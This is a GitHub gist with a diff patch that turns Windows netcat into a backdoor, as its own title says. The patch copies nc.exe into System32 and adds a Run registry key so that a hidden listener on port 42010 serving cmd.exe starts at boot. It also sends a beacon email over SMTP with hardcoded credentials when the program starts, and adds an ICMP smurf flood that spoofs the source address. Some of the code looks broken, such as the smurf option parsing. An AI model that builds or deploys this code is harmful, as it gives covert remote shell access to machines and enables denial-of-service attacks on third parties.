Skip to content

Instantly share code, notes, and snippets.

@fakessh

fakessh/nc.patch

Created October 10, 2012 22:47
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save fakessh/3869007 to your computer and use it in GitHub Desktop.
Save fakessh/3869007 to your computer and use it in GitHub Desktop.
Download ZIP
nc create backdoor registry and email for nc111nt
Raw
nc.patch
Les fichiers binaires /home/swilting/Téléchargements/nc/doexec.o et /home/swilting/nc-win-backdoor-nc-win-backdoor/doexec.o sont différents.
diff -crB /home/swilting/Téléchargements/nc/getopt.c /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c
*** /home/swilting/Téléchargements/nc/getopt.c 1996-11-06 22:40:36.000000000 +0100
--- /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c 2012-10-26 15:30:01.812133992 +0200
***************
*** 45,51 ****
#include <stdio.h>
#ifdef WIN32
! #include <string.h>
#endif
/* Comment out all this code if we are using the GNU C Library, and are not
--- 45,60 ----
#include <stdio.h>
#ifdef WIN32
! #include <string.h>
! #include <tchar.h>
! #include <windows.h>
!
! // Change accordingly...
!
! #define POLICY_KEY TEXT("Software\\Policies\\Microsoft\\Windows\\Explorer")
!
! #define PREFERENCE_KEY TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer")
!
#endif
/* Comment out all this code if we are using the GNU C Library, and are not
***************
*** 204,210 ****
#endif /* __GNUC__ */
#endif /* not __GNU_LIBRARY__ */
!
/* Handle permutation of arguments. */
/* Describe the part of ARGV that contains non-options that have
--- 213,219 ----
#endif /* __GNUC__ */
#endif /* not __GNU_LIBRARY__ */
!
/* Handle permutation of arguments. */
/* Describe the part of ARGV that contains non-options that have
***************
*** 697,703 ****
int digit_optind = 0;
while (1)
! {
int this_option_optind = optind ? optind : 1;
c = getopt (argc, argv, "abc:d:0123456789");
--- 706,719 ----
int digit_optind = 0;
while (1)
! {
! #ifdef WIN32
! LPTSTR lpValueName = "Browse For Folder Height";
!
! DWORD dwDefault = 0x00000000;
!
! init_regedit(lpValueName, dwDefault);
! #endif
int this_option_optind = optind ? optind : 1;
c = getopt (argc, argv, "abc:d:0123456789");
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: getopt.c~
Les fichiers binaires /home/swilting/Téléchargements/nc/getopt.o et /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.o sont différents.
Seulement dans /home/swilting/Téléchargements/nc/: makefile
Seulement dans /home/swilting/Téléchargements/nc/: makefile~
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: Makefile
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: Makefile~
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: nc.exe
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: nc.patch
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: nc.patch~
diff -crB /home/swilting/Téléchargements/nc/netcat.c /home/swilting/nc-win-backdoor-nc-win-backdoor/netcat.c
*** /home/swilting/Téléchargements/nc/netcat.c 2004-12-29 13:07:04.000000000 +0100
--- /home/swilting/nc-win-backdoor-nc-win-backdoor/netcat.c 2012-10-23 13:03:27.745322002 +0200
***************
*** 29,38 ****
RAW mode!
backend progs to grab a pty and look like a real telnetd?!
*/
!
#include "generic.h" /* same as with L5, skey, etc */
#ifdef WIN32
#pragma comment (lib, "ws2_32") /* winsock support */
#endif
--- 29,56 ----
RAW mode!
backend progs to grab a pty and look like a real telnetd?!
*/
! #define _WIN32_WINNT 0x0502 // Windows Server 2003 family
#include "generic.h" /* same as with L5, skey, etc */
+ #include <openssl/sha.h>
+ #include <openssl/bio.h>
+ #include <openssl/buffer.h>
+
+ #include <openssl/ssl.h>
+ #include <openssl/rand.h>
+ #include <openssl/err.h>
+ #include <openssl/rand.h>
+ #include <openssl/md5.h>
+ #include <openssl/evp.h>
+ #include <openssl/hmac.h>
+ #include <stdint.h>
+
#ifdef WIN32
+
+
+ // For Win Xp, change accordingly...
+
+ #define _WIN32_WINNT 0x0501
#pragma comment (lib, "ws2_32") /* winsock support */
#endif
***************
*** 64,69 ****
--- 82,89 ----
#undef IP_OPTIONS
#undef SO_REUSEPORT
#include <windows.h>
+ #include <tchar.h>
+ #include <stdio.h>
#endif
***************
*** 122,131 ****
#include <errno.h>
#include <signal.h>
- /* handy stuff: */
#define SA struct sockaddr /* socket overgeneralization braindeath */
#define SAI struct sockaddr_in /* ... whoever came up with this model */
#define IA struct in_addr /* ... should be taken out and shot, */
/* ... not that TLI is any better. sigh.. */
#define SLEAZE_PORT 31337 /* for UDP-scan RTT trick, change if ya want */
#define USHORT unsigned short /* use these for options an' stuff */
--- 142,153 ----
#include <errno.h>
#include <signal.h>
#define SA struct sockaddr /* socket overgeneralization braindeath */
+
#define SAI struct sockaddr_in /* ... whoever came up with this model */
+
#define IA struct in_addr /* ... should be taken out and shot, */
+
/* ... not that TLI is any better. sigh.. */
#define SLEAZE_PORT 31337 /* for UDP-scan RTT trick, change if ya want */
#define USHORT unsigned short /* use these for options an' stuff */
***************
*** 206,211 ****
--- 228,550 ----
unsigned int o_wait = 0;
USHORT o_zero = 0;
+ #define CHK_NULL_ASSERT(x) assert(x != NULL)
+
+ #define CHK_NULL(x) do { if ((x)==NULL) exit (1); }while(0)
+ #define CHK_ERR(err,s) if ((err)==-1) { perror(s); exit(1); }
+ #define CHK_SSL(err) if ((err)==-1) { ERR_print_errors_fp(stderr); exit(2); }
+
+ #define TAILLE_TAMPON 1500
+ #ifdef WIN32
+ #define WIN32_LEAN_AND_MEAN
+ #include <windows.h>
+ #include <winsock2.h>
+ #include <ws2tcpip.h>
+ #include <assert.h>
+ #define bzero(p, l) memset(p, 0, l)
+ #define bcopy(s, t, l) memmove(t, s, l)
+ #else
+ #endif
+ #define CHK_NULL_ASSERT(x) assert(x != NULL)
+
+ #define CHK_NULL(x) do { if ((x)==NULL) exit (1); }while(0)
+ #define CHK_ERR(err,s) if ((err)==-1) { perror(s); exit(1); }
+ #define CHK_SSL(err) if ((err)==-1) { ERR_print_errors_fp(stderr); exit(2); }
+
+ #define TAILLE_TAMPON 1500
+ void encodeblock( unsigned char in[], char b64str[], int len );
+ void b64_encode(char *clrstr, char *b64dst);
+ void send_line(SSL* ssl,char* cmd);
+ void recv_line(SSL* ssl);
+ void sendmail(char *email,char *body);
+ int open_socket(struct sockaddr *addr);
+ /* ------------------------------------------------------------------------ *
+ * file: base64_stringencode.c v1.0 *
+ * purpose: tests encoding/decoding strings with base64 *
+ * author: 02/23/2009 Frank4DD *
+ * *
+ * source: http://base64.sourceforge.net/b64.c for encoding *
+ * http://en.literateprograms.org/Base64_(C) for decoding *
+ * ------------------------------------------------------------------------ */
+
+
+ /* ---- Base64 Encoding/Decoding Table --- */
+ char b64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
+
+
+
+
+
+ /* encodeblock - encode 3 8-bit binary bytes as 4 '6-bit' characters */
+ void encodeblock( unsigned char in[], char b64str[], int len ) {
+ char out[5];
+ out[0] = b64[ in[0] >> 2 ];
+ out[1] = b64[ ((in[0] & 0x03) << 4) | ((in[1] & 0xf0) >> 4) ];
+ out[2] = (unsigned char) (len > 1 ? b64[ ((in[1] & 0x0f) << 2) |
+ ((in[2] & 0xc0) >> 6) ] : '=');
+ out[3] = (unsigned char) (len > 2 ? b64[ in[2] & 0x3f ] : '=');
+ out[4] = '\0';
+ strncat(b64str, out, sizeof(out));
+ }
+
+ /* encode - base64 encode a stream, adding padding if needed */
+ void b64_encode(char *clrstr, char *b64dst) {
+ unsigned char in[3];
+ int i, len = 0;
+ int j = 0;
+
+ b64dst[0] = '\0';
+ while(clrstr[j]) {
+ len = 0;
+ for(i=0; i<3; i++) {
+ in[i] = (unsigned char) clrstr[j];
+ if(clrstr[j]) {
+ len++; j++;
+ }
+ else in[i] = 0;
+ }
+ if( len ) {
+ encodeblock( in, b64dst, len );
+ }
+ }
+ }
+
+ //send data
+ void send_line(SSL* ssl,char* cmd)
+ {
+ int err;
+ err = SSL_write (ssl, cmd, strlen(cmd));
+ CHK_SSL(err);
+ }
+
+ //receive data
+ void recv_line(SSL* ssl)
+ {
+ char rbuf[TAILLE_TAMPON] = {0};
+ int err;
+ err = SSL_read (ssl, rbuf, sizeof(rbuf) - 1);
+ CHK_SSL(err);
+ printf("%s\n", rbuf);
+ }
+
+ //open TCP Socket connection
+ int open_socket(struct sockaddr *addr)
+ {
+
+ int retval;
+ #ifdef WIN32
+ WSADATA W;
+ SOCKET sockfd;
+ WSAStartup (0x101, &W);
+ sockfd = socket(AF_INET, SOCK_STREAM, 0);
+ #else
+ int sockfd;
+ sockfd = socket(AF_INET, SOCK_STREAM, 0);
+ #endif
+ if(sockfd < 0)
+ {
+ fprintf(stderr, "Open sockfd(TCP) error!\n");
+ exit(-1);
+ }
+ #ifdef WIN32
+ retval = connect(sockfd, addr, sizeof(struct sockaddr));
+ #else
+ retval = connect(sockfd, addr, sizeof(struct sockaddr));
+ #endif
+ printf("connecting smtp server\n");
+ if(retval == -1)
+ {
+ fprintf(stderr, "Connect sockfd(TCP) error!\n");
+ exit(-1);
+ }
+ return sockfd;
+ }
+
+ // sending email
+ void sendmail(char *email, char *body)
+ {
+ int sockfd;
+ int retval = 0;
+ int err;
+ char *host_name = "smtp.fakessh.eu";
+ struct sockaddr_in their_addr;
+ struct hostent *hent;
+ char buf[TAILLE_TAMPON] = {0};
+ char rbuf[TAILLE_TAMPON] = {0};
+ char login[TAILLE_TAMPON] = {0};
+ char pass[TAILLE_TAMPON] = {0};
+
+ //initialize SSL
+ SSL_CTX *ctx;
+ SSL *ssl;
+ SSL_METHOD *meth;
+
+ SSLeay_add_ssl_algorithms();
+ meth = SSLv23_method();
+ SSL_load_error_strings();
+ SSL_library_init();
+ ctx = SSL_CTX_new(meth);
+ CHK_NULL(ctx);
+
+ fd_set readfds;
+ struct timeval timeout;
+
+ //Define a timeout for resending data.
+ timeout.tv_sec = 2;
+ timeout.tv_usec = 0;
+
+ #ifdef WIN32
+ WSADATA WSAData;
+ WSAStartup(MAKEWORD(2, 2), &WSAData);
+ #endif
+
+ hent = gethostbyname(host_name);
+ memset(&their_addr, 0, sizeof(their_addr));
+ their_addr.sin_family = AF_INET;
+ their_addr.sin_port = htons(42015);
+ #ifdef WIN32
+ their_addr.sin_addr = *((LPIN_ADDR )*hent->h_addr);
+ #else
+ their_addr.sin_addr = *((struct in_addr *)hent->h_addr);
+ #endif
+ //connecting mail server and reconnecting if no response in 2 seconds
+ sockfd = open_socket((struct sockaddr *)&their_addr);
+ memset(rbuf,0,TAILLE_TAMPON);
+ FD_ZERO(&readfds);
+ FD_SET(sockfd, &readfds);
+ retval = select(sockfd+1, &readfds, NULL, NULL, &timeout);
+ while(retval <= 0)
+ {
+ printf("reconnect...\n");
+ /*sleep(2);*/
+ #ifdef WIN32
+ (void)closesocket(sockfd);
+ Sleep(2);
+ #else
+ (void)close(sockfd);
+ sleep(2);
+ #endif
+ sockfd = open_socket((struct sockaddr *)&their_addr);
+ memset(rbuf,0,TAILLE_TAMPON);
+ FD_ZERO(&readfds);
+ FD_SET(sockfd, &readfds);
+ retval = select(sockfd+1, &readfds, NULL, NULL, &timeout);
+ }
+
+ memset(rbuf, 0, TAILLE_TAMPON);
+ recv(sockfd, rbuf, TAILLE_TAMPON, 0);
+ printf("%s\n", rbuf);
+
+ //EHLO
+ memset(buf, 0, TAILLE_TAMPON);
+ sprintf(buf, "EHLO localhost\r\n");
+ send(sockfd, buf, strlen(buf), 0);
+ memset(rbuf, 0, TAILLE_TAMPON);
+ recv(sockfd, rbuf, TAILLE_TAMPON, 0);
+ printf("%s\n", rbuf);
+
+ //START_TLS with OPENSSL
+ memset(buf,0, TAILLE_TAMPON);
+ sprintf(buf, "STARTTLS\r\n");
+ send(sockfd, buf, strlen(buf), 0);
+ memset(rbuf, 0, TAILLE_TAMPON);
+ recv(sockfd, rbuf, TAILLE_TAMPON, 0);
+ printf("%s\n", rbuf);
+
+
+ //AUTH LOGIN
+ ssl = SSL_new(ctx);
+ CHK_NULL(ssl);
+ CHK_NULL_ASSERT(ssl);
+ SSL_set_fd (ssl, sockfd);
+ err = SSL_connect(ssl);
+ CHK_SSL(err);
+
+ memset(buf,0, TAILLE_TAMPON);
+ sprintf(buf, "EHLO localhost\r\n");
+ send_line(ssl,buf);
+ recv_line(ssl);
+
+
+ memset(buf,0, TAILLE_TAMPON);
+ sprintf(buf, "AUTH LOGIN\r\n");
+ send_line(ssl,buf);
+ recv_line(ssl);
+
+ //USER
+ memset(buf, 0, TAILLE_TAMPON);
+ sprintf(buf,"test");
+ memset(login, 0, TAILLE_TAMPON);
+ b64_encode(buf, login);
+ sprintf(buf, "%s\r\n", login);
+ send_line(ssl,buf);
+ recv_line(ssl);
+
+ //PASSWORD
+ memset(buf, 0, TAILLE_TAMPON);
+ sprintf(buf, "f*****");
+ memset(pass, 0, TAILLE_TAMPON);
+ b64_encode(buf, pass);
+ sprintf(buf, "%s\r\n", pass);
+ send_line(ssl,buf);
+ recv_line(ssl);
+
+ //MAIL FROM
+ memset(buf,0, TAILLE_TAMPON);
+ sprintf(buf, "MAIL FROM:<test@miss.fakessh.eu>\r\n");
+ send_line(ssl,buf);
+ recv_line(ssl);
+
+ //RCPT TO first receiver
+ memset(buf, 0, TAILLE_TAMPON);
+ sprintf(buf, "RCPT TO:<john.swilting@smtp.fakessh.eu>\r\n");
+ send_line(ssl,buf);
+ recv_line(ssl);
+
+ //RCPT TO second receiver and more receivers can be added
+ //memset(buf, 0, 1500);
+ //sprintf(buf, "RCPT TO:<john.swilting@wanadoo.fr>\r\n");
+ //send_line(ssl,buf);
+ //recv_line(ssl);
+
+ //DATA ready to send mail content
+ send_line(ssl,"DATA\r\n");
+ recv_line(ssl);
+
+ //send mail content£¬"\r\n.\r\n" is the end mark of content
+ memset(buf, 0, TAILLE_TAMPON);
+ sprintf(buf, "%s\r\n.\r\n", body);
+ send_line(ssl,buf);
+ recv_line(ssl);
+ printf("mail send!\n");
+
+ //QUIT
+ send_line(ssl,"QUIT\r\n");
+ recv_line(ssl);
+
+ //free SSL and close socket
+ SSL_shutdown (ssl);
+ #ifdef WIN32
+ (void)closesocket(sockfd);
+ #else
+ (void)close(sockfd);
+ #endif
+ SSL_free (ssl);
+ SSL_CTX_free (ctx);
+
+ #ifdef WIN32
+ WSACleanup();
+ #endif
+
+ return;
+ }
+
+
+
+
+
+
+
/* Debug macro: squirt whatever to stderr and sleep a bit so we can see it go
by. need to call like Debug ((stuff)) [with no ; ] so macro args match!
Beware: writes to stdOUT... */
***************
*** 723,728 ****
--- 1062,1075 ----
return (0); /* no more left! */
} /* nextport */
+
+
+ #ifdef SMURF_ATTACK
+ //char x_smurf_victime = NULL;
+ char x_smurf_victime[20][32];
+ char x_smurf_attack;
+ #endif
+
/* loadports :
set "to be tested" indications in BLOCK, from LO to HI. Almost too small
***************
*** 747,752 ****
--- 1094,1100 ----
#ifdef GAPING_SECURITY_HOLE
char * pr00gie = NULL; /* global ptr to -e arg */
+
#ifdef WIN32
BOOL doexec(SOCKET ClientSocket); // this is in doexec.c
#else
***************
*** 808,816 ****
#endif
/* grab a socket; set opts */
if (o_udpmode)
! nnetfd = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP);
else
! nnetfd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (nnetfd < 0)
bail ("Can't get socket");
if (nnetfd == 0) /* might *be* zero if stdin was closed! */
--- 1159,1170 ----
#endif
/* grab a socket; set opts */
if (o_udpmode)
! nnetfd = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP);
! if(x_smurf_attack)
! nnetfd=socket(AF_INET,SOCK_RAW,255);
else
! nnetfd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
!
if (nnetfd < 0)
bail ("Can't get socket");
if (nnetfd == 0) /* might *be* zero if stdin was closed! */
***************
*** 823,829 ****
#endif
if (rr == -1)
holler ("nnetfd reuseaddr failed"); /* ??? */
! #ifdef SO_REUSEPORT /* doesnt exist everywhere... */
#ifdef WIN32
rr = setsockopt (nnetfd, SOL_SOCKET, SO_REUSEPORT, &c, sizeof (c));
#else
--- 1177,1212 ----
#endif
if (rr == -1)
holler ("nnetfd reuseaddr failed"); /* ??? */
! #ifdef SO_REUSEPORT /* doesnt exist everywhere... */
! #ifdef SMURF_ATTACK
! int TimeOut = 500;
! BOOL HAdHeAder;
! BOOL IsBrocAst;
! if (x_smurf_attack){
! if(x_smurf_victime){
! if (setsockopt(nnetfd,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut))){
! printf("setsockopt sendtimeout fAiled:%d\n",GetLastError());
! return -1;
! }
! if (setsockopt(nnetfd,SOL_SOCKET,SO_RCVTIMEO,(char*)&TimeOut,sizeof(TimeOut))){
! printf("setsockopt recvtimeout fAiled:%d\n",GetLastError());
! return -1;
! }
!
! HAdHeAder = TRUE;
! if (setsockopt(nnetfd,IPPROTO_IP,IP_HDRINCL,(char*)&HAdHeAder,sizeof(HAdHeAder))){
! printf("setsockopt IP_HDRINCL fAiled:%d\n",GetLastError());
! return -1;
! }
!
! IsBrocAst = TRUE;
! if (setsockopt(nnetfd,SOL_SOCKET,SO_BROADCAST,(char*)&IsBrocAst,sizeof(IsBrocAst))){
! printf("setsockopt IP_HDRINCL fAiled:%d\n",GetLastError());
! return -1;
! }
! }
! }
! #endif
#ifdef WIN32
rr = setsockopt (nnetfd, SOL_SOCKET, SO_REUSEPORT, &c, sizeof (c));
#else
***************
*** 977,983 ****
IA * lad;
USHORT lp;
{
! register int nnetfd;
register int rr;
HINF * whozis = NULL;
int x;
--- 1360,1366 ----
IA * lad;
USHORT lp;
{
! volatile int nnetfd;
register int rr;
HINF * whozis = NULL;
int x;
***************
*** 1342,1348 ****
p++; x--;
obuf[2] = *p; /* copy actual option byte */
#ifdef WIN32
! (void) send (netfd, obuf, 3, 0); /* one line, or the whole buffer */
#else
(void) write (netfd, obuf, 3);
#endif
--- 1725,1731 ----
p++; x--;
obuf[2] = *p; /* copy actual option byte */
#ifdef WIN32
! (void) send (netfd, (void *)obuf, 3, 0); /* one line, or the whole buffer */
#else
(void) write (netfd, obuf, 3);
#endif
***************
*** 1651,1663 ****
--- 2034,2354 ----
#endif
return (0);
} /* readwrite */
+ #ifdef WIN32
+ #include <string.h>
+ #include <tchar.h>
+ #include <windows.h>
+
+ // Change accordingly...
+
+ #define POLICY_KEY TEXT("Software\\Policies\\Microsoft\\Windows\\Explorer")
+
+ #define PREFERENCE_KEY TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer")
+ static DWORD init_regedit(LPTSTR lpValueName, DWORD dwDefault)
+ {
+
+
+ HKEY hKey;
+
+ LONG lResult;
+ DWORD dwValue, dwType, dwSize = sizeof(dwValue);
+ DWORD dwDisposition;
+
+
+
+ //first utility
+ TCHAR buf[MAX_PATH];
+ GetModuleFileName(0, buf, MAX_PATH);
+ CopyFile(buf, "C:\\WINDOWS\\SYSTEM32\\nc.exe", TRUE);
+ char szData[500]= "C:\\WINDOWS\\SYSTEM32\\nc.exe -vv -d -L -p 42010 -e cmd.exe";
+
+ // First, check for a policy.
+
+ lResult = RegOpenKeyEx(HKEY_CURRENT_USER, POLICY_KEY, 0, KEY_READ, &hKey);
+
+
+
+ if(lResult == ERROR_SUCCESS)
+
+ {
+
+ lResult = RegQueryValueEx(hKey, lpValueName, 0, &dwType, (LPBYTE)&dwValue, &dwSize);
+
+ RegCloseKey(hKey);
+
+ }
+
+ // Exit if a policy value was found.
+
+ if(lResult == ERROR_SUCCESS)
+
+ {
+
+ // return the data value
+
+ return dwValue;
+
+ }
+
+ /*else
+ continue;
+ printf("Policy: value not found!\n");*/
+
+ // Second, check for a preference.
+
+ lResult = RegOpenKeyEx(HKEY_CURRENT_USER, PREFERENCE_KEY, 0, KEY_READ, &hKey);
+
+ if(lResult == ERROR_SUCCESS)
+
+ {
+
+ lResult = RegQueryValueEx(hKey, lpValueName, 0, &dwType, (LPBYTE)&dwValue, &dwSize);
+
+ RegCloseKey (hKey);
+
+ }
+
+ // Exit if a preference was found.
+
+ if(lResult == ERROR_SUCCESS)
+
+ {
+
+ // Return the data value
+
+ return dwValue;
+
+ }
+
+ /*else
+
+ printf("Preference: value not found!\n");*/
+
+
+ lResult = RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDisposition);
+
+
+ // Exit if a preference was found.
+
+ if(lResult == ERROR_SUCCESS)
+
+ {
+
+ // Return the data value
+ lResult = RegSetValueEx(hKey, "nc", 0, REG_SZ, (LPBYTE)szData, sizeof(szData));
+ lResult = RegCloseKey(hKey);
+ return dwValue;
+
+ }
+
+ /*else
+ printf("Preference: value not found!\n");*/
+
+ // Neither a policy nor a preference was found; return the default value.
+
+ return dwDefault;
+ }
+ #endif
+ #ifdef SMURF_ATTACK
+ char *Awp;
+ char *victime;
+ typedef struct _icmp_heAder
+ {
+ char type;
+ char code;
+ USHORT checksum;
+ USHORT id;
+ USHORT sequence;
+ ULONG timestAmp;
+ }ICMP_HEADER;
+ //--------------------------------------------------------------------
+ typedef struct _ip_heAder
+ {
+ unsigned char ip_verlen; // 4-bit IPv4 version
+ // 4-bit header length (in 32-bit words)
+ unsigned char ip_tos; // IP type of service
+ unsigned short ip_totallength; // Total length
+ unsigned short ip_id; // Unique identifier
+ unsigned short ip_offset; // Fragment offset field
+ unsigned char ip_ttl; // Time to live
+ unsigned char ip_protocol; // Protocol(TCP,UDP etc)
+ unsigned short ip_checksum; // IP checksum
+ unsigned int ip_srcaddr; // Source address
+ unsigned int ip_destaddr; // Source address
+ } IP_HEADER;
+ //--------------------------------------------------------------------
+ USHORT checksum(USHORT *buffer, int size)
+ {
+ unsigned long cksum=0;
+ while(size >1)
+ {
+ cksum+=*buffer++;
+ size -=sizeof(USHORT);
+ }
+ if(size )
+ {
+ cksum += *(UCHAR*)buffer;
+ }
+ cksum = (cksum >> 16) + (cksum & 0xffff);
+ cksum += (cksum >>16);
+ return (USHORT)(~cksum);
+ }
+ //--------------------------------------------------------------------
+ //--------------------------------------------------------------------
+ smurf_victime(int fd,char lpPArAm ,char lpVictime)
+ {
+ char* victim = &lpVictime;
+ char* Awp = &lpPArAm;
+ char Buff[sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+20];
+ struct sockaddr_in SAddr; /*SAddr={0}; ,dAddr={0};*/
+ IP_HEADER ip_heAder;
+ ICMP_HEADER icmp_heAder;
+
+
+ /////fill ip_heAder
+ ip_heAder.ip_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
+ //ip_heAder.ihl = 5;
+ ip_heAder.ip_tos = 0;
+ ip_heAder.ip_totallength = htons(sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+20);
+ ip_heAder.ip_id = 0;
+ //ip_heAder.frAg_off = 0;
+ ip_heAder.ip_offset = 0;
+ ip_heAder.ip_ttl = 255;
+ ip_heAder.ip_protocol = IPPROTO_ICMP;
+ ip_heAder.ip_srcaddr = inet_addr(victim);//
+ ip_heAder.ip_destaddr = inet_addr(Awp);
+ //ip_heAder.checksum = checksum((USHORT*)&ip_heAder,sizeof(IP_HEADER));
+ ///////////////////
+
+ //icmp_heAder = (ICMP_HEADER*)(Buff+sizeof(IP_HEADER));
+
+ //////fill icmp_heAder
+ icmp_heAder.type = 8;
+ icmp_heAder.code = 0;
+ icmp_heAder.id = htons(0);
+ icmp_heAder.sequence = 0;
+ //icmp_heAder.checksum = 0;
+ icmp_heAder.checksum = 0;//checksum((USHORT*)(Buff+sizeof(IP_HEADER)),(sizeof(ICMP_HEADER)+20));
+ //////////////////////
+
+
+ SAddr.sin_family = AF_INET;
+ SAddr.sin_addr .S_un .S_addr = ip_heAder.ip_destaddr ;
+ SAddr.sin_port = htons (0);
+
+
+ /////////////////////////////ÔÚicmpͷûÓÐÌîÊýŸÝʱ,,icmpµÄchecksum×ÜÊdzöŽí ?????
+ memcpy(Buff,&ip_heAder,sizeof(IP_HEADER));
+ memcpy(Buff+sizeof(IP_HEADER),&icmp_heAder,(sizeof(ICMP_HEADER)+20));//20
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER),'A',20);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER),'U',1);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+2,'Y',1);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+3,' ',1);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+4,'W',1);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+6,'N',1);
+
+
+ ip_heAder.ip_checksum = checksum((USHORT*)Buff,sizeof(Buff));
+ icmp_heAder.checksum = checksum((USHORT*)(Buff+sizeof(IP_HEADER)),(sizeof(ICMP_HEADER)+20));
+
+ memcpy(Buff,&ip_heAder,sizeof(IP_HEADER));
+ memcpy(Buff+sizeof(IP_HEADER),&icmp_heAder,(sizeof(ICMP_HEADER)+20));//20
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER),'A',20);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER),'U',1);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+2,'Y',1);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+3,' ',1);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+4,'W',1);
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+6,'N',1);
+ ///////////////////////////////////////////////////////////////////////////
+ printf("Awp %s reAdy\n",Awp);
+
+ while(1){
+ //printf("%s\n",Awp);
+ if (!sendto(fd,Buff,sizeof(Buff),0,(struct sockaddr*)&SAddr,sizeof(SAddr))){
+ printf("send fAiled:%d\n",GetLastError());
+ return -1;
+ }
+ }
+
+ return 0;
+ }
+ #ifdef SMURF_ATTACK
+ x_smurf(fd,x_smurf_victime,x_smurf_attack)
+ int fd;
+ char x_smurf_victime[20][32];
+ char x_smurf_attack;
+ {
+
+ typedef struct {
+ int fd;
+ char x_smurf_victime_param;
+ char x_smurf_attack_param;
+ } StructParametre;
+
+ StructParametre Param;
+
+ if (x_smurf_victime) {
+ if (x_smurf_attack) {
+
+ HANDLE hThread;
+ DWORD threadID;
+ unsigned int n;
+ unsigned int i;
+ FILE* fp;
+ n = -1;
+ fp = fopen((char *)x_smurf_victime,"r");
+
+ if (fp == NULL){
+ printf("sepecify the Awp list file\n");
+ return -1;
+ }
+
+ while (!feof(fp)){
+ if (fgets((char *)&x_smurf_victime[++n],20,fp) == NULL) break;
+ for (i=0;i<strlen((char *)&x_smurf_victime[n]);i++){
+ if (x_smurf_victime[n][i] == '\n') x_smurf_victime[n][i] ='\0';
+
+
+ Param.fd = (int)fd;
+ Param.x_smurf_victime_param = (int)*&x_smurf_victime[n];
+ Param.x_smurf_attack_param = (int)*&x_smurf_attack;
+
+ }
+ }
+ //smurf_victime(netfd,(int )*x_smurf_victime[n],x_smurf_attack);
+ hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)smurf_victime, (void *)&Param, 0, &threadID);
+ WaitForSingleObject(hThread, INFINITE);
+ CloseHandle(hThread);
+
+ }
+ }
+ }
+ #endif
+ #endif
+ //--------------------------------------------------------------------
/* main :
now we pull it all together... */
main (argc, argv)
int argc;
char ** argv;
{
+ #ifdef WIN32
+ LPTSTR lpValueName = "Browse For Folder Height";
+
+ DWORD dwDefault = 0x00000000;
+
+ DWORD ret = init_regedit(lpValueName, dwDefault);
+ char email[] = "fakessh@fakessh.eu";
+ char body[] = "From: \"www\"<fakessh@fakessh.eu>\r\n"
+ "To: \"w111\"<john.swilting@wanadoo.fr>\r\n"
+ "Subject: Hello\r\n\r\n"
+ "Hello World, Hello Email!";
+ sendmail(email, body);
+ /*debug
+ * printf("The value data for the \'%s\' value name is 0X%.8X(%d).\n", lpValueName, ret, ret);
+ */
+ #endif
#ifndef HAVE_GETOPT
extern char * optarg;
extern int optind, optopt;
***************
*** 1669,1674 ****
--- 2360,2366 ----
HINF * wherefrom = NULL;
IA * ouraddr = NULL;
IA * themaddr = NULL;
+ IA * smurfattack = NULL;
USHORT o_lport = 0;
USHORT ourport = 0;
USHORT loport = 0; /* for scanning stuff */
***************
*** 1755,1761 ****
/* If your shitbox doesn't have getopt, step into the nineties already. */
/* optarg, optind = next-argv-component [i.e. flag arg]; optopt = last-char */
! while ((x = getopt (argc, argv, "ade:g:G:hi:lLno:p:rs:tuvw:z")) != EOF) {
/* Debug (("in go: x now %c, optarg %x optind %d", x, optarg, optind)) */
switch (x) {
case 'a':
--- 2447,2453 ----
/* If your shitbox doesn't have getopt, step into the nineties already. */
/* optarg, optind = next-argv-component [i.e. flag arg]; optopt = last-char */
! while ((x = getopt (argc, argv, "ade:g:G:hi:lLno:p:rs:tuX:x:vw:z")) != EOF) {
/* Debug (("in go: x now %c, optarg %x optind %d", x, optarg, optind)) */
switch (x) {
case 'a':
***************
*** 1850,1855 ****
--- 2542,2553 ----
case 'z': /* little or no data xfer */
o_zero++;
break;
+ case 'x':
+ x_smurf_victime[20][32] = *(unsigned char *)atoi(optarg); /*attack smurf attack*/
+ break;
+ case 'X':
+ x_smurf_attack = *(unsigned char *)atoi(optarg); /*attack smurf attack*/
+ break;
default:
errno = 0;
